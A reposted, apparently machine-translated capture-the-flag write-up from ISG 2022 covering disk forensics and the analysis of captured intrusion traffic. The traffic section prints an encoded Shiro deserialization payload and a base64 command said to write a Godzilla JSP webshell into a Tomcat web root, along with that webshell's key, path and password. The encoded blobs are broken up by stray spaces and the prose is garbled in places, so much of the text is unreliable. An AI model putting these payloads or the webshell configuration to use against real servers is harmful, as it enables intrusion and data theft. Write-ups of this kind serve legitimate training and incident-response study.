Original link: https://5ime.cn/isg-2022.html
There are many things to do at the beginning of the school, and the time of Guan’an and Wangding perfectly coincides, and it is simple to paddle.
Misc
DISG
Hacker Li Ming edited an important file on his disk and deleted it immediately. We got his disk image file. Can you help us find out the confidential file he edited?
Use DiskGenius to open the img file, \$RECYCLE.BIN\S-1-5-21-87142730-3356978945-767715265-500 find the word document, right-click to extract it to the desktop
delete delete the cat picture and find the flag
castle
A company’s website has been hacked, and the emergency response team has extracted the intrusion traffic from the protective equipment. Please analyze the hacker’s attack method and find out the secret stolen by the hacker
After an analysis, it was found that it was a traffic packet shiro反序列化
decrypt
1
|
I /IbecdoTLq2HpnFM2lXlhrLbsv3/g ViRRAsf3EhGkvcNoXYhldmcHb /QFxwzzPg+1jsCOwz9EaLUTTYU2gVmPJb7SrP5dznpSguhYMO4Cm1XvJmMcgWX9cL7L3IIIj8NMFiGHioEQtIUvk4lVErq0Fgr+vkLHdWePoWXklJMGqcR3C9ZAoQziw/ 84 +MLx7PMhAq0P3erQQItqOrafNC0Q /bXZUjM+zhtLIjzEDCz94ecrT3FWs33dIoHFKvCaQMW3yunZGw0g7PI+wwBs8ctkDx3F9+iMn9GuyYp53kAywyIW04BdErAesRGOLyiBE2BCvnCGL7TyJG/ rBy2wuYKaVfpoqsucELeFE5MtupNtvmleszzccXWB9idBV4NcSZf3urlb1pM4V1zc /BCl650m3ueawt6u6wo17objzeRM3DF++jclQ3KFIAK6BpgZK+1O+z4ehHgLD8ibPsucm/ v+ /BcVkoDCFqwRMUoomCrbHHVrbq/ IrBW /fO+eN4kicbVmnovW8v4yR/u xMoDHCtqNlyv10 /+jxmnber7LM0ww4+qYcHxyw8qgzVbHlYXHVcYmgE128bQVQgjg3zDeftC0KCMV7fM5/ LO3Lnckgr794TqhC7SMpOaeMllEvh7kvJfRU7T6muCZR0l /Ou4XT9cJD4wbETDldAxUoFK1jPIEAYhkVbQ42tn8gSrUnZhpqtXebYIiKmYeu714aaiYhNt47ws6DXpmej59DDShi421xcLM0r+6TApe5ghs1+NACBm6X1O/ tPZHK1rdqQDCqG0sFhbEFn1PuZsynl8EiN1L2P5QQZfhj2nP9QSvuGOTTIqZ1DOC /QT0UtEK6/ b1cm0iftQzWo1 /neSg9o7FUO5B3Dwgxq6E6GskQWSXhA8fOHoYZPWlVycD/g LZdVKzBylL2twxewo7VcRQeDOEv5punoTrYKXvegKY8uAdI67aH /UWX/ hDlhwj5oEKLXKA3KTKQ71qo3DEOIMVhoxnTPObu5cuiZzArdNZhMs8+RwkCnMHOByK /FGcMLO134WnhuuF0bH+xGvcDrXBHpWL9imS/ 5 kqlr24R+MEYC0A5bcJeP9BkvtuAdln9LRuH8tkyVgdNNIzy+GFC5wneDyPqmIN6QrJP4VojuhqxgLAhwQBPnKQb /T0XrUO0S1Us3pLrobNM9EXwLRHqR50k/ 6 QKxKsdSxW4MfRnnbqZ /qZg1HYbhd+qb93QdcnbEFV2GkMTDxdl5no5I6+lqODrNBNQQVbUaYxSrE+vAvWT+/u NzSStcPiG1CSPcNulNmPLYzEJ8IBQmwIXswKIsfWGlASl7Ex85aAneBTOgiKp0tWHrCDS9dbyJ4idlqEmUqGBYo02kXXP6+bx /IaXPu1CpcupiHBEltCUY5VGoC0UhwD+v+fifNX61C9hoSQNSL3QnmJBNQSd+CpbrQd0EuGAMYIvFgZ6vk4wUKKTvhubzSjn5Z3M9XrUoZxR4wKTuOX8gqiwTmF00wYkF7mO8NMgE3aZIHCqQ64BYZi6khGaSW+/ /LbTLOY9d7TBp4TDG4qQ86b6ehTRLJc2d3rTzw4gv8stdVi1jHMJzmQJs+UQTOqlkvUty8VhEkOxU8OJ91KayxYKkkOKx3DKRHwYBb12PsdsPv4IZNufuuuC8z3bbdrjF4LOcNyArVmxqjtGAU4GGj2ae0LSTkgheX5CDvOV0upAKim8xgWeU6EnXqCQpvFx9XDkGcaamkBUEGSse4NfqoCNE0Ib/ EDaclFPESxk4Ufr0TZ9 /F/ ZVDjyZjNQyJ6SjaiYuKf9x2g5QQcBlqG6CP+ZGWKdYDWjGMfuDdHg19QI9oH6CSTAw50Nxnm6+VLz6UDQN6pKDOMaAP /1Q8wvpm0BZa47AuSBtz8CDW1pC5VtbEkjxvvofQqZORW/ 6 qKBpupTqXDaLd4mIdjf0HFoe2mDl+fvDuhmr5qNBMHp+mu4A2Qj24IdJv4w4MqR92W /t6ks6s32axgWhtCfbo5QVavNghlsgfiCqsPukIU8naWDunD9U+WnZfHddHlo9936IuPavce6B0ZIsTdehLPEUNLFAkVW/ tl /F2gxFBwUHXxA7Dk0EeI1NpZB6LVvLsl/ kXc67AGTplX0nX657zqd8hhmzcZdy7sgLZFslhbHvn8yvsp68MyR+ 1 oi030l+Ayq6Ti595xGz0nOIgw8QSVo45Vecdrb226c+UXFMOAVlfmYrS2oSP20lhgSxEf4zqYj67EqwrcH8C0l3scG5H46H08zcW7Ja58ylcGZVVLTfX3 /wATp9Vm/i 3AiwpEQ0vEzYLHrygmfwFNIAboSSYAuDbhTMOJRxj9zdlvZKf5U7Nuf1KUk30j1t91vEa8gx9FvKi /G85Gw+raUR3zqMVW+a6ySaq+T7CNFNkfSwXufOjyY+MZmh6hmvNE/ jEyPG+wKLa6YHoCyXr25XjGhMLVg1SIE2Mq36uaXq+ 7 tWMxxUwJziEbw0URIddCe5BDf8nA1LD0TPgsC6l3nM9DVsIs1Ly3Ja7ODJijJuRYFLQnlyvXVJ4jwMncFQYlFhy27nxXuPpuwOf2LXmMyq+XzcB /ZV9V5Mk8lMCaNhd/ CTGO2KnYIoty0hyPj6so6f+GqV3+cyGEPrS3Feh9BW /9BlAM+RR/ JBrU23NgC8XTu6HXDpnA0He0DYDJoyjxYOVFd1QPlUXzBd13H3PCznALmBGm+UDkKsUEABkOC2q6faEje43jm7FCmotX1jykKdXwmUmHpY26tNGm5hUKgu9uwixqX6jEKLoFCVkJUT7wSgvTlLndKJTaxPkBlfd8luiiP6CTX5nN7uKenDlg72veyfXzqgokvy4UQfo /1cDS5CfjiHDVA3tq0O/ E1NBK0xArFWfPkOeOaPZQcNmL+ATRmRnfKKRlVxfhvqZQ82xLY8mp9nE /tMU37iGnBXL9DSZkh2kbpexJNN7PJZJWnaHh1h6DK3LmzxLQt5gub/ KBASpelis7U+ 9 cOsT2BPzIrDDnaZOA /nYtaijNwtTngIOk7YrAqP+smVCvfzngWwr1nMoK+7vWgwzKCUCCSqtLT3wswt5jf0w8lRZbLIpKy242YBb1XgfPnQAXjVwyYztxFNlfZ6TVpHItONoSLhYEoE117M/ Ukc79BlBSGbRAC+CEMng7suA4hDqj4E3zETdmXloRmyz5ghe8xTnYntWWFLaFFwPVRURNJWxfwtgrR7Ga30W6Z709Cx /VSZ6DiiRfuodW5oGQutATODUwA+MtwypfyBMCxJghbEuTIayhYaDLxmKpaEq1kCfNK8rWXtfiAiC5C0njvCYHcyaAF6V6q8FaAzxLcxB/ kIpU8Fj88HJVDeXlNuxrrjKk /ag0t8Tpb0cYlj3IZz9xUEhaAaIsnW6Wso1/ fo8vAwDjj6rIh6KWe2PphaO6+JE4OS1uLp /EmzPpnmzpVbRi3pfa9oUshQwRjYNx3fBpFCriksFcDeh4yXtsBMqt+cNpQhSaYx20Fm7Xy8X7Pu40IRotT8EopA1zkUYAsub7VEPCMhOpf6KEcfG8IgRYBb0YkVEtonha9doXEpKfRFLufxXiek2SVFpfgiAPHMZWWH60D5Z0PgRrwAxjTGQV7OHbdYlNmKvSZtMUUKJm2GpHJ4kOenvrKzFCfMbqqEKLC+JMfVxId/g PSD9X /4Eg5iI7e1eVX6kZwc8F3eAAbfSGRdft6tyxbR6vK5r47Cg4ZNy85VyaFj3EBIWeD68TSsHr72+i7WgxjBdsdpMcZS1WKQso1TN2YZ+GMMtE2t+bLzY/ G8DlQParR5MNLnPh22 /XKZfVsmNaMb97PrSk8MscSNlyimnJZwRENsqfPAVJM/ IpdSlLqD7GatuPTiVjrWMjn6ezqVCO9xqi9myZii5Jt8UU4qxXKnkSIMHuisXS /ICGK6Nif4lfimvmAWlE8FPOd49Uufob3etgkqwBsxkx9JQoHpk/g eJdpFH23sFJWazd9+zN0VM7+ /YE5G5SpU9UMempFNp0PMx2vI0JD+8Uy36IkzX5sw4Xedn3Zsfne5jSlIEQvNdDST0At9cXXtDXvLehWdM+WlbKvi2NwqxA1/ hLXuhw8VHgK9khpriAtbNkVTkNVk5xlV /5JoGm5t1HCnVxU0+v8SgjJXp/ 5 wDqRK5KF1kHrPVYdfdeWRFy2lbQBu8KqxIM2xWqZFZEhNzAGiTCZ1VV0mA+ 7 XVEl3Pk6n9bTSoMTdcJlOPI7pomEhReYZhxOcfOpuInmsuF2 /2qAuCJ0Er/ h+WXF /Cq1z3Teo2wvD8zev8afRv7hU5oBEvPNTeQEMJbehj4kfIH30RB/ UyzwK7Lyu7Jv3ht+y4lFw36SMwFwIv2EOPD91r1AQ3WAnj80p8quOpuHS3ONmvAT4ijGBOKAfNbh8RgWKSY31ozzM7igeQzkrwxQjU7L7ot2UUPFk2+aifAfv1MpvBf6K /PYhqarArN3Q5T6QFD3xtCyzqHPnKVw19DiA/ hJ8ZtCJXiYqJ3cGHh6xa4mqnWT4Ae /HKHYHt5aKlS6Yor/ GbRyiziEsGg+LXA9cWiFzQ9ZMkbxPWWdMpxOir /JnPAWpR2iRRYugJEsLcj770H3h4pNsmhcGuopWmUklrET/ J4ruNR92mvvns+YEhjnHO3FQwh4EX2QbNuglBHK6B3MtaGVOjCZz8OnUp3MG7GkQFGymjttZhrglgpx7GocuiTSvI8s3qkmHiK6O7+RMKoyWqsx3Rpzx3hLzrahlKFyO0sswqLjkXORGqdEBFVdX /ZS8lfYCq4d2hIqtx6ZHZnkF+6QeJcyF71WKmQE+6Qhj860I8cFSWETSFQ0DsP6LThAXv6cPBNFUSi/ lGz7o1dyR2hf4yOsX7sIav+kCQ1eGHcTEjk0fq7NZCDxOZouRtz /DL0eL60xA/ FbX+zekaKkDIIFPjG2FcgLw8NuRbBy4+ox+fbAcdJoAw55J3FlFP4wDSASR9zffjiWF4I65kpsX4MBqezYwHq4cqRpFEq2daTC52KB3dbeFlxvKZXhvEi /BtenPN/ 4 jKNCT+YCFSiBaRmsaSC6ntjR6c23bW45SWSfC6RpO3im7ubJORIQbPNCxt2D9Bnc6+d2vR7b3xj6Act6Ic7KOGmyb3rMHmoG1sME2P1vBNSo7WCTLceJVrWemZzNv9RzM8eEHROOKbcbMUDL19fG+VJc1yp+KMN /fAHhLQ/ a7r+Zy /SJvxH/ J9GO1OFlNpcfEt /E1U5ADoAgV7q3A11lcUacQzUNCeVfvPhPUwAGt+pMjLuKi58DoNujQTP8N1qPg8YQqrcr79Z0st1uPvy6TwnZAXGQFzuIwyL1IoV1GI+3c/ 51 sjqUCLZ0 /z0Ow6emOLhW5qd6mIdQbB/ WEkEzOWUFDz44zGca99Ad8g783VYD6ljuVXH7toogzD0mlxsVyLk6AqOVG49 /rZa6Jgg31Jzu7qRv/ NqvJ6MqPpPNWD18q83OzHDbJ7FthZ5dv6WsYoo3beLHTZeSh859HJIOf3usKtvxAWrvL84TdD /L6b5PdgC8Z81SQPYXLndNmgwRe9B52wOMOhA2qWBBcGchkcUOZRWV7MnH+gRP1MgQ+AxdL5lBc2P7s9nZYbVf9etIQO17epJt0mOUgBhDWgY26z9AuvAODYEpNq+Cgca2h2EfYeEf/ kNseB9OklgfCcgdgaXammReJb7BAJ1ZtBIOEFeldl /bVIOYnB58+oKZ/ O8XBTt6IN2xwPCMylsg7NEqPFT0IKc4eqcsfQfqR4aiDnJVm2BSTjIKM+ADwu8slCl15tJh4LSqCgR0IORW9pgf+ 2 E+AR598prXmPqY1oevCJbPZTFMlip6T2qiJl8PN6qDN9L9C3g4CVRi3Re6Y7xf5vZAGO2SaB0ReS7iE7gCMWdzd+OG7fKgigBwnEbMS0wh1wcvHJNYA9qaofhw8HZup1VyxXl6tPxNgkvexXLJ4kh7 /EooG/ 9 r4 /bOF8GV+a1zwlx+YeSg7ZmT/ HG3eoJrilpc8NaDtZKQVOclo8SMW6t7SaUJeKEOW1b2F9L0iVOKsIzEkDMB6JPPCvOQzo5xWhV /s/ EBNqiiPcRtUdWBPu0FDt02CIQEfE9hQQNPFRMfTyg==
|
It was found that a base64 was executed through echo , and after decoding, it was found that the content was written to logout.jsp
1
|
ZW NobyBINHNJQUZ2 Zi 9 XSUMv N1 ZXYTIvYk 5 oVDlL NXlBQUNRbUVFbmFCR3 RWcllpVERDaTJyQz NjWWdHR2 ZhQ 29 hMXVkWGlPcFJL N2 cvOTdMaHh 3 N3 NkTzFSVDRrb3 Noekw4 ODlQT 0 wxcTRPZ nlOU29 vcDZUWHFiUk0 za 0 toOWt 2 NG9 VOE 9 qaytmaTZpWkZ 4 dGhkW nBaUC9 melZY NVNZcC8 xTTcr M0 V 1 V 0 VGbmlrR ndUNkEzVXVTYm45 djJQU nVTZ2 hyYkx 5 a 0 tTYTdveF NUNnpRWGN0 S 1 BxWkphdUFjT 3 ZrUGMyV 0 J 2 NytoOGlNRFFwTXAycmlvRHlIV1 ZHRFExR 1 p 4 ZVF 3 Umd 3 d m9 a NmJCV1 loWTU 0 UT M0 K 0 pkS ncxVFFtaUpoVWJpRkhMNFpPNEVUMlhhdG1 haHA 4 WDdRSVp 5 WFRITEorRGVWT nJJMm9 KTkRx N25 FWX NrYnlvQzBPcjEwY3 ZqK 01 hY nNsV25 H NUI4 aWxJWlA 0 N0 xLZjRSb nRwMDB5 UWpLWX M5 bGxZRWtxVFBHOStLM nBSVW8 w NnJxUXdja0 hvWlMraE 5 VVlRFMWlMVUhkbGlZZ 1 ZDV 1 VpSzRPUHV 6 T 2 hZYWdaR 2 NJUVEwbnFJN0 Z 1 NGdybkdtU25 DclBrVjZDMW 1 NTkZNUWR0 U 0 pWVWlIMEVzUz NHMWNVSmlsSHhyczJGQWFvM2 E 3 UkhvOFBKVUYrc nBSRzA0 cFV 3 Q 3 o0 cDVtOXFB M1 Awd 0 ZGTUtw NjdQUkROVGVQWjA2 TlQrL 0 t 4 eG NNL0 Z 4 cW 9 QZVFkQXBGaEZTVE NCeXEwVzZBTU01 dyt 2 NnhsazhQb2 pBeWx NZ3 ZW M0 dweWwzRHdQdlQ 0 SkVUZmlMS 0 RMU 245 ZXVyQWZOYW 9 QMFdGcXJq Nk9 sT 1 VmT 0 xXVWFLMzJTZVFodmlkRmVid 2 tWYXZLek NMSnFjUkRzTnlGTHN0 R 0 hyc 3 B 2 a 1 hpVHBzbUV 4 R 0 Z 1 R 2 tXUWl 5 cWZ 4 b ndUYXpnbHY5 RU 5 TM G1 mRUFIQTVMSDhKb nd2 M m51 MXJ 2 R 0 hK NnRPZnU0 UmEw N3 dDY 0 ltUz NKTHFyZVZWb3 lTZ G4 wOHZ 4 QkJRS 1 EvWXB nenV2 Zllhdzc 2 bjY 2 YW 85 d G40 YkRlZW 9 QYlRjYU M5 WHp nVTR5 NDAyL0 xybFF 2 U 1 BXeTZIU nkzbmlmMWZ5 M2 xXTE 9 UY 0 k 3 NWZmU0 Mrci 8 yQitDSFhrMWx 0 TFBET 2 F nOFUyV2 UxYjZoMjBzMW 1 Yc 1 ducVhtbjRR NStmWFZnTzFud0 NsN0 JJdDJ 5 bTRML 3 VuQ m52 eE 1 LMVRG NDBkcUdqZGV4 US 9 mVVBtSXlF NlVHbGhRelFqWGU5 cmlsalRrel NEL3 I 4 R 0 xI M3 I 4 c 3 NXbEhMRTJkSllZUnBuZkNYRXU4 c G1 aUjZIdXliZlIvZTgyL 2 R 3 U 1 F 6 Z 3 FRd 1 RBU 3 ZwODFjTmRS N09 DS nMzdlJjTnRyenBRU3 k 3 ZWRhVHVEY 29 Pb 2 lGQUszOU 4 xcTlrSHBPdVBaSlpTLzh 1 RWZhVjhkczhzTTQ 2 TVVUe nE5 OXlZYUxGb G5 qZlkzSHBqZTU 5 dW 0 xcURUZ nNYTmxWYlBMKzFBNG85 bStzdTA 3 N2 JIY 2 JZ NzJ5 V 2 RmOTdOSGlybi 9 XQkJ NYXV5 N1 Y 5 Mkt nT0 dQc 0 dFbzdDYXZmdkVEVGRG M0 J 4 WlFJ M0 NnQUEgfGJhc2 U 2 NCAtZHxnemlwIC1 kID 4 gL 3 Vzci 9 sb 2 NhbC90 b 21 jYXQvd 2 ViYXBwcy 9 ST 09 UL 2 xvZ 291 dC 5 qc 3 A=
|
Decrypted again and found that it is the most common Godzilla jsp马
In the last stream, it was found that pass became supersuperpassword
Decrypt and find the new write path index.html and new key
1
2
3
4
5
|
path =/ index.html
secretKey = 57 e7bebdf2501f02
evalClassName = org.apache.coyote.ser.std.SerializableSerializer
methodName = run
pwd = supersuperpassword
|
We directly replace the key and decrypt it again, and decrypt the last response packet to get the flag
1
|
4611012 B612C3BAEPHCNu5r7f03UZyZQ5gQIbjDUiDIV3stT2ZcFdJ93TLGhwtWGNkxIaVxiqBTwpqYoGA6ZJz8w/UD9h2A0vwpkyA = = C9331C0E8C9FA966
|
This article is reprinted from: https://5ime.cn/isg-2022.html
This site is for inclusion only, and the copyright belongs to the original author.